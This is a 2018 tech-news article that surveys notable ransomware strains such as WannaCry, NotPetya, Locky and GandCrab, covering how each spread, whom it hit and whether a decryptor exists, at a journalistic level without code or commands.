The worst types of ransomware attacks

The first known ransomware attack was called the AIDS Trojan and was unleashed via floppy disks in 1989, but it wasn't until the global panic caused by WannaCry in 2017 that the malware entered the public consciousness.

The rise of bitcoin as an almost untraceable payment and the growing set of evidence that digital extortion could be profitable made ransomware a common cyber threat by 2016, according to Kaspersky Lab. It continued to wreak havoc in 2017 and its surge shows little sign of respite.

Ransomware is difficult to stop even for Windows computers running antivirus, although that situation is improving. The only reliable defence is a backup, but even that can come under attack if it can be reached from the infected PC.

As the threat is unlikely to subside in the foreseeable future, we look at the most deadly strains of ransomware to have emerged so far.

Read next: Ransomware explained - What is ransomware and how can it be stopped?

NotPetya
iStock

NotPetya

The NotPetya ransomware was based on the same EternalBlue SMB exploit as WannaCry combined with EternalRomance, also stolen from the NSA. NotPetya works its way into a system's master boot record and interferes with a machine from booting.

It was a branch from the Petya malware, first discovered in 2016, but modified to spread quickly. NotPetya first targeted companies in Ukraine including that country's national bank, followed by infections across Europe and in the United States. According to analysts, the attack most likely originated in Russia – and was first unleashed on Ukraine during the Constitution Day holiday.

Security experts suggested that because the demand for payment was relatively low, the intention of the malware designers was probably to cause damage rather than generate income. Infosec vendor SentinelOne said that the malware was "more akin to a wiper, which is generally regarded as a malware responsible for destroying data on the target’s hard disk".

High-profile businesses were also hit including Maersk Line and WPP, as well as logistics business DHL – and even the Cadbury’s factory in Tasmania.

The White House castigated Russia for the attack, claiming that it caused billions in damages all in. British defence secretary Gavin Williamson accused Russia of "ripping up the rule book" for the attack.

Bad Rabbit
Image: Symantec

Bad Rabbit

Following in the footsteps of WannaCry and NotPetya was Bad Rabbit, which when it was launched quickly infected Russian websites such as news agency Interfax plus an airport in Ukraine and a metro system in Kiev. US officials said attacks had been reported from "many countries around the world".

A malware dropper was hidden on legitimate websites, but there was no exploit in the code meaning the user had to manually execute the malware dropper, disguised as an installer for Adobe Flash. It would save as a malicious DLL as infpub.dat and launch with the rundl32 component.

Jaff

Jaff

The anatomy of the Jaff ransomware is similar to Locky but demanded more than $3,000 from its victims to unlock files – with no guarantee, of course, that they'd get them back.

An email campaign propagated by the Necurs botnet spread the ransomware at the incredible rate of 5 million emails per hour, typically with attachments to infected PDF attachments.

Jaff, which was capable of encrypting offline without the need for a command and control server, targets 423 different file extensions – everything from .xlsx to .mpeg and .doc and .txt.

Fortunately, Kaspersky has provided a decryptor for free.

GandCrab
iStock

GandCrab

A new strain of ransomware called GandCrab was discovered early in January 2018. The malware takes an unusual route to infect victims through the RIG EK and GrandSoft EK exploit kits and demands a cryptocurrency fee of 1.5 Dash (just under £500 at the time of writing) for the return of any files.

Researchers from Australian cybersecurity firm LMNTRIXtold SC Media that GandCrab was being marketed as a ransomware-as-a-service package to budding cyber criminals, who could split the profits with the developers 60:40.

Larger partners have the option to increase their share to 70 percent, but the developers behind the ransomware have ruled out any targets in the Commonwealth of Independent States - the confederation of former Soviet Republics including Russia.

The lack of reported attacks thus far suggests the business is yet to take off.

GoldenEye - taking parts of Ukraine offline

GoldenEye - taking parts of Ukraine offline

The ransomware attacks reported in Ukraine, which hit the national bank, state power company and Kiev's largest airport on June 27, 2017, was, according to Bitdefender Labs, caused by GoldenEye ransomware, which is thought to be a mixture of Petya and another ransomware, called Mischa. (See Malwarebytes.)

And while ransomware usually encrypts files, Petya, variants of it and GoldenEye target whole computer systems. Like Petya, GoldenEye will prevent computer systems from being booted up and from victims retrieving any stored data.

When the user reboots, instead of Windows they could see a skull and crossbones splash screen with a ransom demand. Effectively, they are holding hostage the files and the entire system by encrypting the Master File Table, making the files inaccessible.

However, unlike Petya, GoldenEye will not provide any help for victims to retrieve the decryption keys from the computer systems.

Like the recent global WannaCry ransomware attacks which affected NHS England, GoldenEye is believed to use the EternalBlue exploit kit which exploited vulnerabilities in the Server Message Block protocol to spread the infection through file sharing networks during the NHS attacks.

WannaCry - cryptoworm targetting Windows causes havoc to NHS

WannaCry - cryptoworm targetting Windows causes havoc to NHS

EuroPol has described the WannaCry ransomware, which shut down hospital infrastructure all over the UK and uses a leaked exploit first developed by the National Security Agency, as unprecedented in scale.

The attack was launched on Friday 12 May and quickly spread to more than 200,000 systems around the world. Security researcher Kafeine found that WannaCry had code based on the NSA’s EternalBlue malware, which was leaked earlier this year by the group calling itself the Shadow Brokers. According to BleepingCompuer, EternalBlue exploits a vulnerability in the Server Message Block protocol to spread through file sharing networks. MalwareBytes Labs reports that the worm creates two threads, first to scan for hosts on the local network, and the other that scans hosted online. Infected machines will see the malware demand a payment of up to $600 to decrypt the files.

Microsoft had patched the exploit in update MS17-010 in March this year, but unpatched systems or those running older versions of Windows without Windows Update enabled were still open to infection. The company took the unusual step of releasing another patch for older operating systems, including the generally unsupported Windows XP.

But by that time hospitals, doctor’s surgeries and accident and emergency wards in the UK had been affected by the attack and some were even reportedly turning patients away. Home secretary Amber Rudd confirmed that one in five NHS England trusts had been hit by the attack, but insisted no patient data had been compromised.

Elsewhere, organisations hit by the attack included Telefonica in Spain, Renault in France, and delivery company FedEx in the USA, as well as China’s state oil company and railways in Germany. Russia was believed to have most instances of the attack.

Security researchers warn that another wave of attacks is likely, and that the code could easily be evolved to become more sophisticated and harder to stop. It’s suspected that an organised criminal group was behind the attack.

Locky – well engineered, ruthless, clever

Locky – well engineered, ruthless, clever

The work of the criminals behind the Dridex botnet, Locky is as bad as ransomware can get. Locky’s creators seem to have thought of everything, not only encrypting a wide range of data files but even Bitcoin wallets and Windows Volume Snapshot Service (VSS) files in case users try and restore files using that.  Reaches out to attached shares and even other PCs and servers. Uses strong encryption and has found several high-profile victims.

Petya - locking down the whole system
iStock

Petya - locking down the whole system

Unlike other ransomware listed, Petya doesn't mess around with file encryption, instead, it targets whole computer systems.

For a Petya attack to be successful it will need to overwrite the Master Boot Record (MBR), causing a full blue screen of death crash.

This will mean, when the victim turns on their machine, they'll be met with a skull and crossbones landing page and of course a ransom note.

Crysis - Locky copycat with big ambitions

Crysis - Locky copycat with big ambitions

First detected by ESET in early 2016, Crysis styles itself on Locky in that it encrypts shadow copies and every file it can find including in some cases system files. This rather odd behaviour means that the infected PC can become inoperable. Attempts to elevate its privileges to admin level by stealing available logins and even steals files, including user credentials. Targets VMware virtual machines. ESET has a decryptor for early versions.

zCrypt – ransomware that behaves like a virus

zCrypt – ransomware that behaves like a virus

zCrypt tries the unusual technique of spreading as a virus. This means that it doesn’t rely on malicious emails to find victims and can spread on USB sticks. Creates a custom autorun.inf that allows it to execute automatically when it is plugged into a second machine. Instead of automatically encrypting all the files it can find it simply detects important directories and encrypts files that are changed. Scrambles files first to make recovery impossible.

PowerWare – PowerShell hijacker

PowerWare – PowerShell hijacker

Discovered by security firm Carbon Black, this one is interesting because it is aimed at businesses using Microsoft Word and the PowerShell scripting interface. This malware’s innovation is that after tempting the user to enable macros to view a booby-trapped Word attachment it runs without files, hooking PowerShell to download a malicious script.  Writing no files makes it hard to detect its activity when it encrypts files. Carbon Black says that recovery is possible.

HydraCrypt – ransomware can be beaten

HydraCrypt – ransomware can be beaten

Offshoots of the CrypBoss ransomware, Hydracrypt is notable for being pushed by the highly-active Angler exploit kit that suddenly and mysteriously disappeared in June 2016, HydraCrypt is possibly famous for the battle between its creators and a researcher called Fabian Wosar. So far, Wosar is winning hands down, having released decryptors for successive versions of this family. A decrypter is available to help victims recover.

Copyright © 2018 IDG Communications, Inc.